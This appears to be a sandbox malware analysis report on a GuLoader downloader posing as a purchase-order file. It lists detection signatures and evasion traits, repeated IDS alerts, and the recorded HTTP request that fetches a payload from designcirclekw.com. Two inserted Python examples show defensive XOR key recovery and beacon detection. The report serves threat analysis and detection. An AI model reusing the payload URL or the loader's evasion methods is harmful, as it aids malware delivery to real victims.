

Windows Analysis Report
PO-10212024168877 PNG2023-W101.exe

Overview

General Information

Sample name: PO-10212024168877 PNG2023-W101.exe
Analysis ID: 1544856
MD5: e7504a48d78545ef459890b5c36b6b17
SHA1: 7dd9b7b12c2a58f83235edd771801bae8b94b6f3
SHA256: 7d0590445da76f1149aefce04bc517b15b330871cd3bd8c196a032e28588ee9e
Tags: exe, user-threatcat_ch

Detection

GuLoader
Score: 72
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected GuLoader
AI detected suspicious sample
Machine Learning detection for sample
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Sample execution stops while process was sleeping (likely an evasion)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
CloudEyE, GuLoader | CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
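The description above notes that the downloaded payload is XOR-encoded. The following Python is an added example, not code from this report, Joe Security or Malpedia, showing one way to recover a repeating XOR key from such a blob without knowing it in advance. It assumes the plaintext is a Windows PE, that encryption starts at offset 0 and that the key is at most 32 bytes long, and it uses the reserved bytes of the DOS header (offsets 0x1C through 0x3B, zero in practically every PE) as known plaintext. The encrypted blob below is constructed here; the report does not show what designcirclekw.com returned for the .bin request.

```python
"""Recover a repeating XOR key from a downloaded, XOR-encoded PE payload.

Added example; not code from the report, Joe Security or Malpedia.
Assumptions: the blob is a Windows PE encrypted from offset 0 with a
repeating key of at most 32 bytes.  The sample below is constructed here;
the report does not show what the .bin request returned.
"""
import struct

# Offsets 0x1C..0x3B of the DOS header (e_res, e_oemid, e_oeminfo, e_res2)
# are zero in practically every PE, so those 32 ciphertext bytes are a
# verbatim slice of the key stream.  Hence the assumed key length <= 32.
WINDOW_START, WINDOW_END = 0x1C, 0x3C
MAX_KEY_LEN = WINDOW_END - WINDOW_START


def xor_repeating(data: bytes, key: bytes) -> bytes:
    """XOR `data` with `key`, repeating the key as needed."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def looks_like_pe(data: bytes) -> bool:
    """Structural check: 'MZ' at 0 and 'PE\\0\\0' at e_lfanew, both in bounds."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return 0x40 <= e_lfanew <= len(data) - 4 and data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def recover_xor_key(blob: bytes):
    """Return (key, plaintext), or None if no key of length <= 32 yields a PE."""
    if len(blob) < WINDOW_END:
        return None
    window = blob[WINDOW_START:WINDOW_END]
    for period in range(1, MAX_KEY_LEN + 1):
        # The window must repeat with this period to be a candidate key length.
        if any(window[i] != window[i % period] for i in range(len(window))):
            continue
        # window[i] is key[(WINDOW_START + i) % period]; rotate it back into place.
        key = bytearray(period)
        for i in range(period):
            key[(WINDOW_START + i) % period] = window[i]
        plain = xor_repeating(blob, bytes(key))
        if looks_like_pe(plain):   # a spurious short period fails this check
            return bytes(key), plain
    return None


def build_fake_pe() -> bytes:
    """Constructed stand-in for a downloaded payload (not real malware)."""
    dos = bytearray(0x40)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x80)                 # e_lfanew
    stub = b"This program cannot be run in DOS mode.\r\n$".ljust(0x40, b"\x00")
    nt = b"PE\x00\x00" + struct.pack("<H", 0x14C) + b"\x00" * 18  # i386 machine
    return bytes(dos) + stub + nt


SAMPLE_KEY = bytes.fromhex("5a1377c401e9")          # assumed 6-byte key
ENCRYPTED_SAMPLE = xor_repeating(build_fake_pe(), SAMPLE_KEY)

if __name__ == "__main__":
    result = recover_xor_key(ENCRYPTED_SAMPLE)
    if result is None:
        print("no repeating key of <= 32 bytes produced a PE")
    else:
        key, plain = result
        print("key:", key.hex(), "decoded PE:", looks_like_pe(plain))
```

The PE-structure check after decoding is what makes this safe to run on unknown blobs: a key whose bytes happen to repeat can satisfy a shorter period, but the bogus candidate is rejected because it does not decode to an `MZ`/`PE` layout. If the key is longer than 32 bytes or the PE does not start at offset 0, the function returns None rather than guessing; widen the known-plaintext window (for example with the zero padding that follows the DOS stub) before relaxing the checks.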
No configs have been found
Source | Rule | Description | Author | Strings
00000006.00000002.3906224944.0000000003648000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
00000000.00000002.2614036861.0000000006688000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
      No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-29T20:37:35.807943+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49976 | 62.215.181.250 | 443 | TCP
2024-10-29T20:37:37.732080+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49977 | 62.215.181.250 | 443 | TCP
2024-10-29T20:37:39.641205+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49978 | 62.215.181.250 | 443 | TCP
2024-10-29T20:37:41.591458+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49979 | 62.215.181.250 | 443 | TCP
2024-10-29T20:37:43.528233+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49980 | 62.215.181.250 | 443 | TCP
2024-10-29T20:37:45.434865+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49981 | 62.215.181.250 | 443 | TCP
2024-10-29T20:37:47.357938+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49982 | 62.215.181.250 | 443 | TCP
2024-10-29T20:37:49.306233+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49983 | 62.215.181.250 | 443 | TCP
2024-10-29T20:37:51.423389+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49984 | 62.215.181.250 | 443 | TCP
2024-10-29T20:37:53.374891+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49985 | 62.215.181.250 | 443 | TCP
2024-10-29T20:37:55.330913+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49986 | 62.215.181.250 | 443 | TCP
2024-10-29T20:37:57.283182+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49987 | 62.215.181.250 | 443 | TCP
2024-10-29T20:37:59.264188+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49988 | 62.215.181.250 | 443 | TCP
2024-10-29T20:38:01.187500+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49989 | 62.215.181.250 | 443 | TCP
2024-10-29T20:38:03.399785+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49990 | 62.215.181.250 | 443 | TCP
2024-10-29T20:38:06.396302+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49991 | 62.215.181.250 | 443 | TCP
2024-10-29T20:38:08.666816+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49992 | 62.215.181.250 | 443 | TCP
2024-10-29T20:38:10.646802+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49993 | 62.215.181.250 | 443 | TCP
2024-10-29T20:38:12.581802+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49994 | 62.215.181.250 | 443 | TCP
2024-10-29T20:38:14.525452+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49995 | 62.215.181.250 | 443 | TCP
2024-10-29T20:38:16.488780+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49996 | 62.215.181.250 | 443 | TCP
2024-10-29T20:38:18.423095+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49997 | 62.215.181.250 | 443 | TCP
2024-10-29T20:38:21.363149+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49998 | 62.215.181.250 | 443 | TCP
2024-10-29T20:38:23.299165+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49999 | 62.215.181.250 | 443 | TCP
2024-10-29T20:38:25.234889+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.8 | 50000 | 62.215.181.250 | 443 | TCP
2024-10-29T20:38:27.329904+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.8 | 50001 | 62.215.181.250 | 443 | TCP
2024-10-29T20:38:29.261822+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.8 | 50002 | 62.215.181.250 | 443 | TCP
2024-10-29T20:38:31.728462+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.8 | 50003 | 62.215.181.250 | 443 | TCP
2024-10-29T20:38:33.685339+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.8 | 50004 | 62.215.181.250 | 443 | TCP
2024-10-29T20:38:35.854783+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.8 | 50005 | 62.215.181.250 | 443 | TCP
2024-10-29T20:38:37.784102+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.8 | 50006 | 62.215.181.250 | 443 | TCP
2024-10-29T20:38:39.728615+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.8 | 50007 | 62.215.181.250 | 443 | TCP
2024-10-29T20:38:41.651229+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.8 | 50008 | 62.215.181.250 | 443 | TCP
2024-10-29T20:38:43.595814+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.8 | 50009 | 62.215.181.250 | 443 | TCP
2024-10-29T20:38:45.551710+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.8 | 50010 | 62.215.181.250 | 443 | TCP
2024-10-29T20:38:47.477000+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.8 | 50011 | 62.215.181.250 | 443 | TCP
2024-10-29T20:38:49.486771+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.8 | 50012 | 62.215.181.250 | 443 | TCP
2024-10-29T20:38:51.395703+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.8 | 50013 | 62.215.181.250 | 443 | TCP
2024-10-29T20:38:53.304632+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.8 | 50014 | 62.215.181.250 | 443 | TCP
2024-10-29T20:38:55.324467+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.8 | 50015 | 62.215.181.250 | 443 | TCP
2024-10-29T20:38:57.221442+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.8 | 50016 | 62.215.181.250 | 443 | TCP
2024-10-29T20:38:59.170316+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.8 | 50017 | 62.215.181.250 | 443 | TCP
2024-10-29T20:39:01.109922+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.8 | 50018 | 62.215.181.250 | 443 | TCP
2024-10-29T20:39:03.053415+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.8 | 50019 | 62.215.181.250 | 443 | TCP
2024-10-29T20:39:04.971362+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.8 | 50020 | 62.215.181.250 | 443 | TCP
2024-10-29T20:39:06.901687+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.8 | 50021 | 62.215.181.250 | 443 | TCP
2024-10-29T20:39:08.829870+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.8 | 50022 | 62.215.181.250 | 443 | TCP
2024-10-29T20:39:10.762910+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.8 | 50023 | 62.215.181.250 | 443 | TCP
2024-10-29T20:39:12.668445+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.8 | 50024 | 62.215.181.250 | 443 | TCP
2024-10-29T20:39:14.647973+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.8 | 50025 | 62.215.181.250 | 443 | TCP
2024-10-29T20:39:16.576285+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.8 | 50026 | 62.215.181.250 | 443 | TCP
2024-10-29T20:39:19.269945+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.8 | 50027 | 62.215.181.250 | 443 | TCP
2024-10-29T20:39:21.199975+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.8 | 50028 | 62.215.181.250 | 443 | TCP
2024-10-29T20:39:23.130461+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.8 | 50029 | 62.215.181.250 | 443 | TCP
2024-10-29T20:39:25.031946+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.8 | 50030 | 62.215.181.250 | 443 | TCP
2024-10-29T20:39:27.014424+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.8 | 50031 | 62.215.181.250 | 443 | TCP
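The alert stream above is 56 hits on one signature, every one on a fresh client port and spaced roughly two seconds apart. As an added example that is not part of the Joe Sandbox report, the following Python scores that regularity the way a detection engineer would when hunting for beaconing in IDS output: it groups alerts per (source, destination, destination port), measures the inter-arrival gaps, and flags the flow when the gaps are near-constant. The embedded rows are a constructed subset of the table above in the same column order; the hit-count and jitter thresholds are assumptions for the example.

```python
"""Beacon-interval analysis over Suricata alerts, as an added example.

Not Joe Sandbox or Suricata code.  SAMPLE_ALERTS is a constructed subset of
the alert table above (same pipe-separated columns); the thresholds are
assumptions, tune them to your own data.
"""
from collections import defaultdict
from datetime import datetime
from statistics import mean, median, pstdev

SAMPLE_ALERTS = """\
2024-10-29T20:37:35.807943+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49976 | 62.215.181.250 | 443 | TCP
2024-10-29T20:37:37.732080+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49977 | 62.215.181.250 | 443 | TCP
2024-10-29T20:37:39.641205+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49978 | 62.215.181.250 | 443 | TCP
2024-10-29T20:37:41.591458+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49979 | 62.215.181.250 | 443 | TCP
2024-10-29T20:37:43.528233+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49980 | 62.215.181.250 | 443 | TCP
2024-10-29T20:37:45.434865+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49981 | 62.215.181.250 | 443 | TCP
2024-10-29T20:37:47.357938+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49982 | 62.215.181.250 | 443 | TCP
2024-10-29T20:37:49.306233+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49983 | 62.215.181.250 | 443 | TCP
"""

TS_FORMAT = "%Y-%m-%dT%H:%M:%S.%f%z"   # matches "2024-10-29T20:37:35.807943+0100"


def parse_alerts(text):
    """Parse pipe-separated alert rows; malformed lines are skipped."""
    rows = []
    for line in text.splitlines():
        parts = [p.strip() for p in line.split("|")]
        if len(parts) != 9:
            continue
        rows.append({
            "ts": datetime.strptime(parts[0], TS_FORMAT),
            "sid": int(parts[1]),
            "src": parts[4], "sport": int(parts[5]),
            "dst": parts[6], "dport": int(parts[7]),
        })
    return rows


def analyze_beacons(text, min_hits=5, max_cv=0.15):
    """Group alerts per (src, dst, dport) and score the regularity of the gaps.

    A flow is flagged as beaconing when it has at least `min_hits` alerts and
    the coefficient of variation (stdev / mean) of the inter-arrival gaps is
    at most `max_cv`, i.e. the timing is near-constant.  Both thresholds are
    assumptions for this example.
    """
    by_flow = defaultdict(list)
    for r in parse_alerts(text):
        by_flow[(r["src"], r["dst"], r["dport"])].append(r)

    report = {}
    for flow, hits in by_flow.items():
        hits.sort(key=lambda r: r["ts"])
        gaps = [(b["ts"] - a["ts"]).total_seconds() for a, b in zip(hits, hits[1:])]
        summary = {
            "count": len(hits),
            # one ephemeral port per hit means a fresh TCP connection each time
            "distinct_sports": len({r["sport"] for r in hits}),
            "median_interval_s": None,
            "cv": None,
            "beaconing": False,
        }
        if len(gaps) >= 2:
            avg = mean(gaps)
            cv = pstdev(gaps) / avg if avg > 0 else float("inf")
            summary.update(
                median_interval_s=round(median(gaps), 3),
                cv=round(cv, 3),
                beaconing=len(hits) >= min_hits and cv <= max_cv,
            )
        report[flow] = summary
    return report


if __name__ == "__main__":
    for flow, s in analyze_beacons(SAMPLE_ALERTS).items():
        print(flow, s)
```

On the rows above the median gap is about 1.92 s with a coefficient of variation under 0.01, and `distinct_sports` equals `count`, so each hit is a new TCP connection rather than traffic on a persistent channel. A real loader that sleeps with random jitter will push the CV up; raise `max_cv` or switch to a period estimate that tolerates jitter (for example the mode of rounded gaps) before concluding a flow is not periodic.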



      AV Detection

Source: PO-10212024168877 PNG2023-W101.exe | ReversingLabs: Detection: 52%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: PO-10212024168877 PNG2023-W101.exe | Joe Sandbox ML: detected
Source: PO-10212024168877 PNG2023-W101.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 62.215.181.250:443 -> 192.168.2.8, version: TLS 1.2, on 14 client ports: 49976, 49977, 49983, 49984, 49985, 49987, 49990, 49995, 49996, 49997, 50008, 50009, 50010, 50027
Source: PO-10212024168877 PNG2023-W101.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe | Code function: 0_2_00406010 FindFirstFileA, FindClose
Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe | Code function: 0_2_004055AE GetTempPathA, DeleteFileA, lstrcatA, lstrcatA, lstrlenA, FindFirstFileA, FindNextFileA, FindClose
Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe | Code function: 0_2_00402688 FindFirstFileA
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8 -> 62.215.181.250:443, raised on all 56 connections (client ports 49976 through 50031, one per connection; the per-connection timestamps are in the Suricata alert table above)
Source: global traffic | HTTP traffic detected (the same request is recorded 55 times in the report):
GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: designcirclekw.com
Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficDNS traffic detected: DNS query: designcirclekw.com
      Source: PO-10212024168877 PNG2023-W101.exe, PO-10212024168877 PNG2023-W101.exe, 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000000.00000000.1445303761.0000000000409000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_Error
      Source: PO-10212024168877 PNG2023-W101.exe, 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000000.00000000.1445303761.0000000000409000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: PO-10212024168877 PNG2023-W101.exe, 00000006.00000001.2607777042.0000000000649000.00000008.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.ftp.ftp://ftp.gopher.
      Source: PO-10212024168877 PNG2023-W101.exe, 00000006.00000001.2607777042.00000000005F2000.00000008.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
      Source: PO-10212024168877 PNG2023-W101.exe, 00000006.00000001.2607777042.00000000005F2000.00000008.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
      Source: PO-10212024168877 PNG2023-W101.exe, 00000006.00000002.3912621480.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3181377278.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3070130873.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3269271168.00000000075DB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3028767017.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.2970031415.00000000075DC000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3142595518.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.2890472384.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3372975726.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3353408541.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3288676137.00000000075DB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3309422923.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3201010339.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3220354716.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.2871405171.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3181585136.00000000075DB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.2852037864.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3220645532.00000000075DB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3394670154.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3070453625.00000000075DB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3162090904.00000000075DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://designcirclekw.com/
      Source: PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3269271168.00000000075DB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3353408541.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3288676137.00000000075DB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3309422923.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3353581442.00000000075DB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3328739652.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3288465328.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3328883453.00000000075DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://designcirclekw.com/$
      Source: PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3249913342.00000000075DB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3249753104.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.2950356283.00000000075DC000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.2950463769.00000000075DC000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3269271168.00000000075DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://designcirclekw.com/4
      Source: PO-10212024168877 PNG2023-W101.exe, 00000006.00000002.3912621480.0000000007568000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://designcirclekw.com/F
      Source: PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3161939016.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3008954123.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3328808939.00000000075B8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.2989432317.00000000075DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://designcirclekw.com/admin/controller/extension/extension/zXcMABFvBCAfEn173.bin
      Source: PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.2832627511.00000000075DA000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.2832535674.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.2813443365.00000000075DC000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.2890472384.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.2871405171.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.2852037864.00000000075D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://designcirclekw.com/admin/controller/extension/extension/zXcMABFvBCAfEn173.bin)
      Source: PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3372975726.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3394670154.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3328739652.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3328883453.00000000075DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://designcirclekw.com/admin/controller/extension/extension/zXcMABFvBCAfEn173.bin5
      Source: PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.2871405171.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.2852037864.00000000075D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://designcirclekw.com/admin/controller/extension/extension/zXcMABFvBCAfEn173.binQ
      Source: PO-10212024168877 PNG2023-W101.exe, 00000006.00000002.3912621480.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3181377278.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3201010339.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3220354716.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3181585136.00000000075DB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3220645532.00000000075DB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3162090904.00000000075DB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3161939016.00000000075D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://designcirclekw.com/admin/controller/extension/extension/zXcMABFvBCAfEn173.binTf
